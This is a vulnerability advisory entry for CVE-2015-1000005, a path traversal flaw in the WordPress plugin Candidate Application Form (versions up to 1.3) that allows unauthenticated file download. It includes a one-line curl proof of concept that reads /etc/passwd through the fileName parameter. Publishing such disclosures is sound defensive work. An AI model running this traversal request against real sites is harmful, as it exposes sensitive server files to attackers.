Candidate Application Form <= 1.3 – Unauthenticated Arbitrary File Download | CVE 2015-1000005

Description

Plugin is still affected and has been closed.

The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.

Proof of Concept

$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd

Affects Plugins

candidate-application-form

No known fix

References

CVE

CVE-2015-1000005

Exploitdb

37754

URL

https://packetstormsecurity.com/files/#132960/

Classification

Type

LFI

OWASP top 10

A1: Injection

CWE

CWE-22

CVSS

7.5 (high)

Miscellaneous

Original Researcher

Larry W. Cashdollar

Submitter

Larry W. Cashdollar

Submitter twitter

_larry0

Verified

Yes

WPVDB ID

446233e9-33b3-4024-9b7d-63f9bb1dafe0

Timeline

Publicly Published

2015-07-12 (about 10 years ago)

Added

2015-07-14 (about 10 years ago)

Last Updated

2020-10-21 (about 5 years ago)

Other

Published

Title

Published

2025-12-11

Title

Multi Uploader for Gravity Forms < 1.1.8 - Unauthenticated Arbitrary File Deletion

Published

2026-05-05

Title

Fluent Forms < 6.2.2 - Admin+ Arbitrary File Read via Path Traversal

Published

2014-08-01

Title

Vitamin 1.0 - add_headers.php path Parameter Traversal Arbitrary File Access

Published

2026-02-25

Title

WP Responsive Images <= 1.0 - Unauthenticated Path Traversal to Arbitrary File Read via src

Published

2026-03-10

Title

PitchPrint < 11.2.0 - Unauthenticated Arbitrary File Deletion